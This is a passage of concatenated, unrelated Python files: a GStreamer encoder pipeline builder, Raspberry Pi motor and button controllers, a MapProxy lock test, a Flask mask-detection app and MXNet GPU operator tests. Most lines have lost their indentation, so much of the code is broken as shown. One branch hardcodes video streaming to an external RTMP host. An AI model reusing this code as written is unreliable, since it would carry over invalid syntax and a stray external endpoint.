# use hardware encoder if found
# Note: Our RTMP output accepts I420 only.
if 'nvv4l2h264enc' in gst_elements:
#nvcompositor !
#h264_encoder = 'appsrc ! nvvidconv ! nvv4l2h264enc ! h264parse'
h264_encoder = 'appsrc ! queue ! videoconvert ! video/x-raw,format=%s ! nvvidconv ! nvv4l2h264enc ! h264parse ! queue' % (video_codec) #autovideoconvert ! nvv4l2h264enc !
        # OMX is deprecated on recent Jetson releases
elif 'omxh264enc' in gst_elements:
h264_encoder = 'appsrc ! autovideoconvert ! omxh264enc preset-level=2'
elif 'x264enc' in gst_elements:
h264_encoder = 'appsrc ! autovideoconvert ! x264enc pass=4'
else:
raise RuntimeError('GStreamer H.264 encoder not found')
#TODO: Same support as input stream? MQTT?
if self.output_protocol == Protocol.RTMP:
pipeline = (
'%s ! flvmux ! rtmpsink sync=false location="%s%s"' # sync=true async=true
% (
h264_encoder,
self.output_uri,
' live=true' if self.output_is_live else ''
)
)
elif self.output_protocol == Protocol.MQTT or self.output_protocol == Protocol.WS:
pipeline = (
#'%s ! fakesink sync=false' #name=sink
'%s ! flvmux ! rtmpsink sync=false location="rtmp://video.etag-hk.com/intern/ch1 live=true"'
% (
h264_encoder,
#self.output_uri, #Will be carried by MQTT module
#' live=true' if self.output_is_live else '' #Will be carried by MQTT module
)
)
else:
pipeline = (
'%s ! qtmux ! filesink location=%s '
% (
h264_encoder,
self.output_uri
)
)
#https://forums.developer.nvidia.com/t/python-opencv-rtmpsink-gstreamer-bug/112272
logger.debug("GSTREAMER OUTPUT: %s", pipeline)
return pipeline
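    # Example of a generated pipeline (illustrative): with only the software x264enc
    # element available and a plain file output, the method above produces
    #   appsrc ! autovideoconvert ! x264enc pass=4 ! qtmux ! filesink location=<output_uri>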
def _capture_frames(self):
logger.debug("_capture_frames()")
while not self.exit_event.is_set():
ret, frame = self.source.read()
with self.cond:
if not ret:
self.exit_event.set()
self.cond.notify()
break
# keep unprocessed frames in the buffer for file
if not self.input_is_live:
while (len(self.frame_queue) == self.buffer_size and
not self.exit_event.is_set()):
self.cond.wait()
self.frame_queue.append(frame)
self.cond.notify()
@staticmethod
def _parse_uri(uri):
result = urlparse(uri)
if result.scheme == 'csi':
protocol = Protocol.CSI
elif result.scheme == 'rtsp':
protocol = Protocol.RTSP
elif result.scheme == 'rtmp':
protocol = Protocol.RTMP
elif (result.scheme == 'http' or result.scheme == 'https'):
protocol = Protocol.HTTP
elif result.scheme == 'mqtt':
protocol = Protocol.MQTT
elif (result.scheme == 'ws' or result.scheme == 'wss'):
protocol = Protocol.WS
else:
if '/dev/video' in result.path:
protocol = Protocol.V4L2
elif '%' in result.path:
protocol = Protocol.IMAGE
else:
protocol = Protocol.VIDEO
return protocol
@staticmethod
def _img_format(uri):
img_format = Path(uri).suffix[1:]
return 'jpeg' if img_format == 'jpg' else img_format
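def example_transcode_loop(input_uri, output_uri=None):
    """Illustrative usage sketch (not part of the original module): capture frames,
    optionally re-encode them, and release resources. The 1280x720 output size is an
    arbitrary choice for this example."""
    stream = VideoIO((1280, 720), input_uri, output_uri=output_uri)
    stream.start_capture()
    try:
        while True:
            frame = stream.read()
            if frame is None:  # end of stream or capture stopped
                break
            if output_uri is not None:
                stream.write(frame)
    finally:
        stream.release()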
|
threadScheduler.py
|
import threading
import os.path
import time
from blueThreadLoop import MainBlue
# class myThread (threading.Thread):
# def __init__(self, threadID, name, counter):
# threading.Thread.__init__(self)
# self.threadID = threadID
# self.name = name
# self.counter = counter
# def run(self):
# print("Starting " + self.name)
# print_time(self.name, 5, self.counter)
# print("Exiting " + self.name)
run = True
runBlue = [True]
fileName = ""
def LookForFile(strToFind, path):
"""
function repeatedly look for a file
"""
# t1.setName("Finder")
global fileName
global run
count = 0
filePath = path + strToFind
while run:
count += 1
if os.path.exists(filePath):
fileName = strToFind
print("{0} FOUND {1} at {2} [{3}]".format(
t1.getName(), strToFind, filePath, count))
MainBlue(runBlue)
run = False
else:
print("{0} not found {1} at {2} [{3}]".format(
t1.getName(), strToFind, filePath, count))
time.sleep(1)
print("exiting file thread!")
def LookForStop(strToFind, path):
"""
function repeatedly look for a file
"""
global run
count = 0
filePath = path + strToFind
while run:
count += 1
if os.path.exists(filePath):
runBlue[0] = False
run = False
print("{0} FOUND {1} at {2} [{3}]".format(
t2.getName(), strToFind, filePath, count))
else:
print("{0} not found {1} at {2} [{3}]".format(
t2.getName(), strToFind, filePath, count))
time.sleep(10)
print("exiting stop thread!")
if __name__ == "__main__":
# creating thread
t1 = threading.Thread(
target=LookForFile, name="THREAD_Finder", args=("rain", "../"), daemon=True)
t2 = threading.Thread(name="THREAD_Stopper",
target=LookForStop, args=("stop", "../"), daemon=True)
# starting thread 1
t1.start()
# starting thread 2
t2.start()
while run:
print("doing nothing...")
time.sleep(20)
# input("Press Enter to flip foo")
# if runBlue[0]:
# runBlue[0] = False
# else:
# runBlue[0] = True
runBlue[0] = False
# input("Press Enter to exit")
run = False
# wait until thread 1 is completely executed
t1.join()
# wait until thread 2 is completely executed
t2.join()
# both threads completely executed
print("Done!")
|
piDcMotor.py
|
#!/usr/bin/python3
# File name : piDcMotor.py
# Description : encapsulates a DC motor connected via Raspberry Pi's GPIO
from time import sleep
from piServices.piUtils import timePrint, startThread
import RPi.GPIO as GPIO
from iotServerLib import piIotNode
# motor states:
# stop - the motor is stop
# starting - the motor is starting and ramping up to requested speed
# moving - the motor is moving at the requested speed
# stopping - the motor is ramping down to stop
MotorStop = 0
MotorStarting = 1
MotorMoving = 2
MotorStopping = 3
# constants
MaxSpeed = 100
MinSpeed = 5 # the minimum speed (absolute value) below which the motor is considered stopped
class PiDcMotor(piIotNode.PiIotNode):
""" controller for a DC motor connected via Raspberry Pi's GPIO
The motor speed control is under a separate thread that start the motor with higher speed (higher torque).
Once started, it would reduce the speed gradually to the requested speed.
There are 4 states: MotorStop, MotorStarting, MotorMoving, MotorStopping
"""
def __init__(self, name, parent, enable, in1, in2, threadCycle=0.05, deltaSpeedPerCycle=5):
""" construct a PiIotNode
name: the name of the node
parent: parent IotNode object. None for root node.
enable: pin number for enable
in1: pin number for in1
in2: pin number for in2
threadCycle: the delay time between the thread processing
deltaSpeedPerCycle: increase/decrease the speed per cycle when starting motor
"""
super(PiDcMotor, self).__init__(name, parent)
self.threadCycleInSecond = threadCycle
self.deltaSpeedPerCycle = deltaSpeedPerCycle
self.initialize(enable, in1, in2)
def initialize(self, enable, in1, in2):
""" initialize the DC motor connected via controller similar to L293D
input arguments:
enable: pin number for enable
in1: pin number for in1
in2: pin number for in2
"""
self.enable = enable
self.in1 = in1
self.in2 = in2
GPIO.setwarnings(False)
GPIO.setmode(GPIO.BOARD)
GPIO.setup(enable, GPIO.OUT)
GPIO.setup(in1, GPIO.OUT)
GPIO.setup(in2, GPIO.OUT)
        try:
            self.pwm = GPIO.PWM(enable, 1000)
        except Exception:
            # keep going if a PWM instance cannot be created on this pin
            pass
# start thread for fine control of motor speed
self._requestedSpeed = 0
self._extraSpeed = 0
self._extraSteeringSpeed = 0
self.motorThread=startThread('Motor Control', target=self._motorControl)
def stop(self):
""" stop the motor """
self._requestedSpeed = 0
return self.speed
def run(self, speed):
""" run the motor with specified speed
speed > 0 run forward max 100
speed < 0 run reverse max -100
speed = 0 stop
return the running speed
"""
self._requestedSpeed = speed
timePrint('Run motor %s at requested speed %i' %(self.name, speed))
return self.speed
def extraSteeringSpeed(self, deltaSpeed):
""" add extra torque speed for steering in addition to the run speed by run(speed) """
self._extraSteeringSpeed = deltaSpeed
def extraSpeed(self, deltaSpeed):
""" request extra speed in addition to the run speed by run(speed) """
self._extraSpeed = deltaSpeed
def _stop(self):
""" internal method to stop the motor """
GPIO.output(self.in1, GPIO.LOW)
GPIO.output(self.in2, GPIO.LOW)
GPIO.output(self.enable, GPIO.LOW)
self.speed = 0
self._motorState = MotorStop
timePrint('Stop motor %s' %self.name)
return self.speed
def _run(self, speed):
""" internal method to run the motor with specified speed
speed > 0 run forward max 100
speed < 0 run reverse max -100
speed = 0 stop
return the running speed
"""
if speed == 0: # stop
self.stop()
elif speed > 0: # forward
speed = min(speed, 100)
GPIO.output(self.in1, GPIO.HIGH)
GPIO.output(self.in2, GPIO.LOW)
self.pwm.start(100)
self.pwm.ChangeDutyCycle(speed)
else: # reverse
speed = max(speed, -100)
GPIO.output(self.in1, GPIO.LOW)
GPIO.output(self.in2, GPIO.HIGH)
self.pwm.start(0)
self.pwm.ChangeDutyCycle(abs(speed))
self.speed = speed
#timePrint('Run motor %s at speed %i' %(self.name, self.speed))
return self.speed
def _motorControl(self):
""" control motor speed must be run in separate thread """
self._stop()
while True:
absRequestedSpeed = abs(self._requestedSpeed)
extraSpeed = self._extraSpeed + self._extraSteeringSpeed
absRunSpeed = abs(self._requestedSpeed) + extraSpeed
if absRequestedSpeed < MinSpeed or absRunSpeed < MinSpeed:
if self._motorState != MotorStop:
self._stop()
else:
if self._motorState == MotorStop:
# starting the motor
if self._requestedSpeed > 0:
self._run(MaxSpeed)
else:
self._run(-MaxSpeed)
self._motorState = MotorStarting
#timePrint('Motor %s State: %i extra: %i' %(self.name, self._motorState, extraSpeed))
elif self._motorState == MotorStarting:
# send new speed for the motor
self._motorStarting(absRunSpeed)
elif self._motorState == MotorMoving:
# motor is already running so just check the speed
if absRunSpeed != abs(self.speed):
self._motorState = MotorStarting
self._motorStarting(absRunSpeed)
#timePrint('Motor %s State: %i extra: %i' %(self.name, self._motorState, extraSpeed))
sleep(self.threadCycleInSecond)
def _motorStarting(self, absRunSpeed):
""" this is for the state MotorStarting to calculate new speed for the motor """
absNewSpeed = abs(self.speed) - self.deltaSpeedPerCycle
if absNewSpeed <= absRunSpeed:
absNewSpeed = absRunSpeed
self._motorState = MotorMoving
#timePrint('Motor %s State: %i extra: %i' %(self.name, self._motorState, self._extraSpeed))
if self._requestedSpeed > 0:
self._run(absNewSpeed)
else:
self._run(-absNewSpeed)
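if __name__ == '__main__':
    # Illustrative sketch only: the BOARD pin numbers below are placeholders and must
    # match the actual wiring of the L293D-style driver board. Note that the motor
    # control thread started in initialize() keeps running in the background.
    motor = PiDcMotor('left', None, enable=32, in1=36, in2=38)
    motor.run(60)    # ramp toward 60% forward
    sleep(3)
    motor.run(-40)   # reverse at 40%
    sleep(3)
    motor.stop()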
|
test_seed_cachelock.py
|
# This file is part of the MapProxy project.
# Copyright (C) 2012 Omniscale <http://omniscale.de>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import with_statement
import multiprocessing
import os
import shutil
import tempfile
import time
from mapproxy.seed.cachelock import CacheLocker, CacheLockedError
class TestCacheLock(object):
def setup(self):
self.tmp_dir = tempfile.mkdtemp()
self.lock_file = os.path.join(self.tmp_dir, 'lock')
def teardown(self):
shutil.rmtree(self.tmp_dir)
def test_free_lock(self):
locker = CacheLocker(self.lock_file)
with locker.lock('foo'):
assert True
def test_locked_by_process_no_block(self):
proc_is_locked = multiprocessing.Event()
def lock():
locker = CacheLocker(self.lock_file)
with locker.lock('foo'):
proc_is_locked.set()
time.sleep(10)
p = multiprocessing.Process(target=lock)
p.start()
# wait for process to start
proc_is_locked.wait()
locker = CacheLocker(self.lock_file)
# test unlocked bar
with locker.lock('bar', no_block=True):
assert True
# test locked foo
try:
with locker.lock('foo', no_block=True):
assert False
except CacheLockedError:
pass
finally:
p.terminate()
p.join()
def test_locked_by_process_waiting(self):
proc_is_locked = multiprocessing.Event()
def lock():
locker = CacheLocker(self.lock_file)
with locker.lock('foo'):
proc_is_locked.set()
time.sleep(.1)
p = multiprocessing.Process(target=lock)
start_time = time.time()
p.start()
# wait for process to start
proc_is_locked.wait()
locker = CacheLocker(self.lock_file, polltime=0.02)
try:
with locker.lock('foo', no_block=False):
diff = time.time() - start_time
assert diff > 0.1
finally:
p.terminate()
p.join()
|
button.py
|
import os
import threading
import time
if os.uname()[1] == 'raspberrypi':
import RPi.GPIO as GPIO
class ArcadeButton:
def __init__(self):
if os.uname()[1] == 'raspberrypi':
GPIO.setmode(GPIO.BCM)
GPIO.setup(4, GPIO.OUT)
GPIO.setup(5, GPIO.IN, pull_up_down=GPIO.PUD_UP)
self.keep_blinking = True
self.count = 0
def start_blink(self):
self.keep_blinking = True
        self.blink_thread = threading.Thread(target=self._blink)
        self.blink_thread.start()
def stop_blink(self):
self.keep_blinking = False
def get_status(self):
if os.uname()[1] == 'raspberrypi':
return GPIO.input(5)
else:
if self.count <= 5:
time.sleep(1)
self.count = self.count + 1
return True
else:
self.count = 0
return False
def _blink(self):
        while self.keep_blinking:
if os.uname()[1] == 'raspberrypi':
GPIO.output(4, 1)
time.sleep(1)
GPIO.output(4, 0)
time.sleep(1)
else:
print('blink on')
time.sleep(1)
print('blink off')
time.sleep(1)
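if __name__ == '__main__':
    # Illustrative sketch only: blink the LED until the button reads pressed
    # (with the pull-up wiring above, GPIO.input(5) goes low on a press).
    button = ArcadeButton()
    button.start_blink()
    while button.get_status():
        time.sleep(0.1)
    button.stop_blink()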
|
maskdetection.py
|
import os
import threading
import argparse
import filetype
import base64
import cv2
import numpy as np
from PIL import Image
from io import BytesIO
from datetime import datetime
from flask import Flask, Response, make_response, send_file
from flask import flash, request, redirect, jsonify
from flask import render_template
from models.realStream import RealStream
from models.facenet import FaceNet
from models.util import utils
# initialize a flask object
app = Flask(__name__)
@app.route("/")
def index():
# return the rendered template
global t
try:
t.running = False
t.join()
except Exception:
print("realtime thread is not running")
return render_template("index.html")
@app.route("/realstream/")
def realStream():
# start a thread that will start a video stream
global t
try:
t.running = False
t.join()
except Exception:
print("realtime thread is not running")
# forward to real stream page
return render_template("realStream.html")
@app.route("/staticstream/")
def staticstream():
# stop the detection thread
global t
try:
t.running = False
t.join()
except Exception:
print("realtime thread is not running")
# forward to static stream page
return render_template("staticStream.html")
@app.route("/imageprocess/")
def imageprocess():
# stop the detection thread
global t
try:
t.running = False
t.join()
except Exception:
print("realtime thread is not running")
return render_template("imageprocess.html")
@app.route("/about/")
def about():
# stop the detection thread
global t
try:
t.running = False
t.join()
except Exception:
print("realtime thread is not running")
# forward to about page
return render_template("about.html")
@app.route("/contact/")
def contact():
# stop the detection thread
global t
try:
t.running = False
t.join()
except Exception:
print("realtime thread is not running")
# forward to contact page
return render_template("contact.html")
@app.route("/imageCapture/")
def imageCapture():
# stop the detection thread
global t
try:
t.running = False
t.join()
except Exception:
print("realtime thread is not running")
# forward to register page
return render_template("imageCapture.html")
@app.route("/videoCapture/")
def videoCapture():
# stop the detection thread
global t
try:
t.running = False
t.join()
except Exception:
print("realtime thread is not running")
# forward to register page
return render_template("videoCapture.html")
#---------------------------------------------------------------------
#----------------------------Functions--------------------------------
#---------------------------------------------------------------------
@app.route("/uploadfile", methods=['GET', 'POST'])
def uploadfile():
if request.method == 'POST':
# save file
file = request.files['uploadFile']
result = utils.save_file(file)
        if result == 0:
            print("file save failed.")
        else:
            print("file saved successfully.")
# call function to process it
rs = RealStream()
# check file type
filepath = utils.get_file_path('webApp/uploads', file.filename)
print(filepath)
if filetype.is_image(filepath):
output = rs.processimage(file.filename)
elif filetype.is_video(filepath):
output = rs.processvideo(file.filename)
else:
print("delete it.")
# allow user to download after process it
return jsonify({'filename': output})
@app.route("/video_feed")
def video_feed():
# return the response generated along with the media type (mime type)
global t
# start a thread that will perform mask detection
rs = RealStream()
t = threading.Thread(target=rs.mask_detection)
t.daemon = True
t.start()
return Response(rs.generate(), mimetype = "multipart/x-mixed-replace; boundary=frame")
@app.route("/download/<fileName>", methods=['GET'])
def download(fileName):
file = utils.get_file_path('static/processed', fileName)
response = make_response(send_file(file))
response.headers["Content-Disposition"] = "attachment; filename={};".format(file)
return response
@app.route("/content_dash", methods=['GET'])
def content_dash():
data = request.values
if data['type'] == 'imagecode':
return render_template('imagecode.html')
if data['type'] == 'imageprocess':
return render_template('imageprocess.html')
if data['type'] == 'folderscan':
return render_template('folderscan.html')
@app.route('/uploadImage', methods=['GET', 'POST'])
def uploadImage():
if request.method == 'POST':
# check if the post request has the file part
if 'uploadImage' not in request.files:
flash('No file part')
return redirect(request.url)
file = request.files['uploadImage']
# save file first
utils.save_file(file)
# encoding and save into db
fn = FaceNet()
username = request.form['username']
(status, message) = fn.save_encode_db(username, file.filename)
response = make_response({"message":message})
response.status_code = status
# response.mimetype = 'text/plain'
# response.headers['x-tag'] = 'sth.magic'
return response
@app.route('/uploadImageBase64', methods=['GET', 'POST'])
def uploadImageBase64():
if request.method == 'POST':
username = request.form['username']
imagebase64 = request.form['imageBase64']
# convert base64 string to image
offset = imagebase64.index(',')+1
img_bytes = base64.b64decode(imagebase64[offset:])
img = Image.open(BytesIO(img_bytes))
img = np.array(img)
# write to file first
filename = datetime.now().strftime("%Y%m%d-%H%M%S") + '.png'
cv2.imwrite(utils.get_file_path('webApp/uploads', filename), utils.toRGB(img))
# encoding and save into db
fn = FaceNet()
(status, message) = fn.save_encode_db(username, filename)
# processed file name
basename = os.path.splitext(os.path.basename(filename))[0]
        extension = os.path.splitext(os.path.basename(filename))[1]
        processedFile = basename + "_face" + extension
response = make_response(jsonify({"message":message, "filename": processedFile}))
response.status_code = status
return response
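# Illustrative client sketch (not part of the app): how a caller could exercise the
# /uploadImageBase64 route above. The default host/port match the argparse defaults
# below; the `requests` dependency and the PNG data-URL prefix are assumptions.
def example_upload_base64(path, username, url="http://127.0.0.1:8000/uploadImageBase64"):
    import requests
    with open(path, 'rb') as fh:
        payload = "data:image/png;base64," + base64.b64encode(fh.read()).decode()
    return requests.post(url, data={"username": username, "imageBase64": payload})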
# execute function
if __name__ == '__main__':
# construct the argument parser and parse command line arguments
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--ip", type=str, default="127.0.0.1", help="ip address")
ap.add_argument("-o", "--port", type=int, default=8000, help="port number of the server")
args = vars(ap.parse_args())
# start the flask app
app.run(host=args["ip"], port=args["port"], debug=True, threaded=True, use_reloader=False)
|
test_operator_gpu.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import sys
import os
import time
import multiprocessing as mp
import unittest
import mxnet as mx
import numpy as np
from nose.tools import assert_raises
from mxnet.test_utils import check_consistency, set_default_context, assert_almost_equal
from mxnet.base import MXNetError
from mxnet import autograd
from numpy.testing import assert_allclose
curr_path = os.path.dirname(os.path.abspath(os.path.expanduser(__file__)))
sys.path.insert(0, os.path.join(curr_path, '../unittest'))
from common import setup_module, with_seed, teardown, assert_raises_cudnn_not_satisfied
from common import run_in_spawned_process
from test_operator import *
from test_numpy_ndarray import *
from test_optimizer import *
from test_random import *
from test_exc_handling import *
#from test_rnn import *
from test_sparse_ndarray import *
from test_sparse_operator import *
from test_ndarray import *
from test_subgraph_op import *
from test_contrib_operator import test_multibox_target_op
from test_tvm_op import *
from test_library_loading import *
set_default_context(mx.gpu(0))
del test_support_vector_machine_l1_svm # noqa
del test_support_vector_machine_l2_svm # noqa
del test_custom_op_fork #noqa
def check_countsketch(in_dim,out_dim,n):
data = mx.sym.Variable("data")
h = mx.sym.Variable("h")
s = mx.sym.Variable("s")
sym = mx.sym.contrib.count_sketch(data=data, h=h, s=s, name='countsketch',out_dim = out_dim)
shape = [(n,in_dim), (1,in_dim),(1,in_dim)] #shape of input x, hash h and hash s
arr = [mx.nd.empty(shape[i]) for i in range(3)]
arr_grad = [mx.nd.empty(shape[i]) for i in range(3)]
x = np.random.uniform(-10, 10, shape[0])
arr[0][:] = x #input x
h = np.random.randint(0, out_dim, shape[1])
arr[1][:] = h #hash h
s = np.random.randint(0, 2, shape[2])*2-np.ones(shape[2])
arr[2][:] = s #hash s
locations = {"data": x, "h": h, "s": s}
a = np.zeros((n,out_dim))
temp = np.multiply(x, s)
for num_sample in np.arange(0,n):
for idx in np.arange(0,in_dim):
a[num_sample][h[0][idx]] += temp[num_sample][idx]
check_symbolic_forward(sym, locations, [a], rtol=1e-3, atol=1e-5, ctx=mx.gpu(0))
out_grad = mx.nd.empty((n,out_dim))
out_grad[:] = np.random.normal(-3, 3, (n,out_dim))
a = np.zeros((n,in_dim))
for j in np.arange(0,n):
for i in np.arange(0,in_dim):
a[j,i] = out_grad.asnumpy()[j, h[0,i]] * s[0,i]
check_symbolic_backward(sym, locations, [out_grad], [a], rtol=1e-3, atol=1e-5, ctx=mx.gpu(0))
@with_seed()
def test_countsketch():
minindim = 40
maxindim = 100
minoutdim = 5
maxoutdim = 30
maxn = 200
in_dim = np.random.randint(minindim, maxindim)
out_dim = np.random.randint(minoutdim, maxoutdim)
n = np.random.randint(1, maxn)
check_countsketch(in_dim, out_dim, n)
def check_ifft(shape):
shape_old = shape
if len(shape) == 2:
if shape[1]%2 != 0:
lst = list(shape)
lst[1] = lst[1]*2
shape = tuple(lst)
shape_old = shape
shape = (shape[0],shape[1]*2)
if len(shape) == 4:
if shape[3]%2 != 0:
lst = list(shape)
lst[3] = lst[3]*2
shape = tuple(lst)
shape_old = shape
shape = (shape[0],shape[1],shape[2],shape[3]*2)
sym = mx.sym.contrib.ifft(name='ifft', compute_size = 128)
init = [np.random.normal(size=shape, scale=1.0)]
arr_grad = [mx.nd.empty(shape)]
ctx_list = [{'ctx': mx.gpu(0),'ifft_data': shape, 'type_dict': {'ifft_data': np.float32}}]
exe_list = [sym.simple_bind(args_grad=arr_grad,**ctx) for ctx in ctx_list]
for exe in exe_list:
for arr, iarr in zip(exe.arg_arrays, init):
arr[:] = iarr.astype(arr.dtype)
# forward
for exe in exe_list:
exe.forward(is_train= True)
out1 = [exe.outputs[0].asnumpy() for exe in exe_list]
if len(shape) == 2:
init_complex = np.zeros(shape_old,dtype = np.complex64)
for i in range(0,shape_old[1]):
init_complex.real[:,i] = init[0][:,2*i]
init_complex.imag[:,i] = init[0][:,2*i+1]
a = np.fft.ifft(init_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, out1[0]/shape_old[1],rtol=1e-3, atol=1e-5)
if len(shape) == 4:
init_complex = np.zeros(shape_old,dtype = np.complex64)
for i in range(0,shape_old[3]):
init_complex.real[:,:,:,i] = init[0][:,:,:,2*i]
init_complex.imag[:,:,:,i] = init[0][:,:,:,2*i+1]
a = np.fft.ifft(init_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, out1[0]/shape_old[3],rtol=1e-3, atol=1e-5)
# backward
if len(shape) == 2:
out_grad = mx.nd.empty(shape_old)
out_grad[:] = np.random.normal(-3, 3, shape_old)
for exe in exe_list:
exe.backward([out_grad])
temp = exe.grad_arrays[0].asnumpy()
temp = np.zeros(shape_old)
for i in range(shape_old[1]):
temp[:,i] = exe.grad_arrays[0].asnumpy()[:,2*i]
a = np.fft.fft(out_grad.asnumpy(), n=None, axis=-1, norm=None)
assert_almost_equal(a.real, temp, rtol=1e-3, atol=1e-5)
if len(shape) == 4:
out_grad = mx.nd.empty(shape_old)
out_grad[:] = np.random.normal(-3, 3, shape_old)
for exe in exe_list:
exe.backward([out_grad])
temp = exe.grad_arrays[0].asnumpy()
temp = np.zeros(shape_old)
for i in range(shape_old[3]):
temp[:,:,:,i] = exe.grad_arrays[0].asnumpy()[:,:,:,2*i]
a = np.fft.fft(out_grad.asnumpy(), n=None, axis=-1, norm=None)
assert_almost_equal(a.real, temp, rtol=1e-3, atol=1e-5)
@with_seed()
def test_ifft():
nrepeat = 2
maxdim = 10
for repeat in range(nrepeat):
for order in [2,4]:
shape = tuple(np.random.randint(1, maxdim, size=order))
check_ifft(shape)
def check_fft(shape):
sym = mx.sym.contrib.fft(name='fft', compute_size = 128)
if len(shape) == 2:
if shape[1]%2 != 0:
lst = list(shape)
lst[1] = lst[1]*2
shape = tuple(lst)
shape_old = shape
if len(shape) == 4:
if shape[3]%2 != 0:
lst = list(shape)
lst[3] = lst[3]*2
shape = tuple(lst)
shape_old = shape
init = [np.random.normal(size=shape, scale=1.0)]
arr_grad = [mx.nd.empty(shape)]
ctx_list = [{'ctx': mx.gpu(0),'fft_data': shape, 'type_dict': {'fft_data': np.float32}}]
exe_list = [sym.simple_bind(args_grad=arr_grad,**ctx) for ctx in ctx_list]
for exe in exe_list:
for arr, iarr in zip(exe.arg_arrays, init):
arr[:] = iarr.astype(arr.dtype)
# forward
for exe in exe_list:
exe.forward(is_train=True)
out1 = [exe.outputs[0].asnumpy() for exe in exe_list]
out = np.fft.fft(init, n=None, axis=-1, norm=None)
if len(shape) == 2:
out = np.reshape(out,(out.shape[1],out.shape[2]))
out2 = np.append(out.real, out.imag, axis = 1)
a = np.zeros(out1[0].shape)
p = 0
for i in range(out2.shape[1]//2):
a[:,p] = out2[:,i]
a[:,p+1] = out2[:,i+out2.shape[1]//2]
p = p+2
if len(shape) == 4:
out = np.reshape(out,(out.shape[1],out.shape[2],out.shape[3],out.shape[4]))
out2 = np.append(out.real, out.imag, axis = 1)
a = np.zeros(out1[0].shape)
for i in range(out1[0].shape[0]):
for j in range(out1[0].shape[1]):
p = 0
for k in range(out2.shape[3]):
a[i,j,:,p] = out2[i,j,:,k]
a[i,j,:,p+1] = out2[i,j+out1[0].shape[1],:,k]
p = p+2
assert_almost_equal(a, out1[0],rtol=1e-3, atol=1e-5)
# backward
if len(shape) == 2:
out_grad = mx.nd.empty((shape[0],2*shape[1]))
out_grad[:] = np.random.normal(-3, 3, (shape[0],2*shape[1]))
# out_grad_to_complex
out_grad_complex = np.zeros(shape,dtype = np.complex64)
for i in range(0,shape[1]):
out_grad_complex.real[:,i] = out_grad.asnumpy()[:,2*i]
out_grad_complex.imag[:,i] = out_grad.asnumpy()[:,2*i+1]
for exe in exe_list:
exe.backward([out_grad])
a = np.fft.ifft(out_grad_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, exe.grad_arrays[0].asnumpy()/shape[1],rtol=1e-3, atol=1e-5)
if len(shape) == 4:
out_grad = mx.nd.empty(out1[0].shape)
out_grad[:] = np.random.normal(-3, 3, out1[0].shape)
# out_grad_to_complex
out_grad_complex = np.zeros(shape,dtype = np.complex64)
for i in range(0,shape[3]):
out_grad_complex.real[:,:,:,i] = out_grad.asnumpy()[:,:,:,2*i]
out_grad_complex.imag[:,:,:,i] = out_grad.asnumpy()[:,:,:,2*i+1]
for exe in exe_list:
exe.backward([out_grad])
a = np.fft.ifft(out_grad_complex, n=None, axis=-1, norm=None)
assert_almost_equal(a.real, exe.grad_arrays[0].asnumpy()/shape[3],rtol=1e-3, atol=1e-5)
@with_seed()
def test_fft():
nrepeat = 2
maxdim = 10
for repeat in range(nrepeat):
for order in [2,4]:
shape = tuple(np.random.randint(1, maxdim, size=order))
check_fft(shape)
@with_seed()
def test_batchnorm_with_type():
ctx_list_v1_2D = [
{'ctx': mx.cpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (10, 2, 10, 10), 'type_dict': {'norm_data': np.float32}},
]
ctx_list_v2_2D = [
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5, 5), 'type_dict': {'norm_data': np.float64}},
]
ctx_list_v2_1D = [
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (5, 2, 5), 'type_dict': {'norm_data': np.float64}},
]
ctx_list_v2_3D = [
{'ctx': mx.cpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.cpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.cpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float64}},
{'ctx': mx.gpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float16}},
{'ctx': mx.gpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float32}},
{'ctx': mx.gpu(0), 'norm_data': (3, 2, 3, 2, 3), 'type_dict': {'norm_data': np.float64}}
]
# V1, 2D
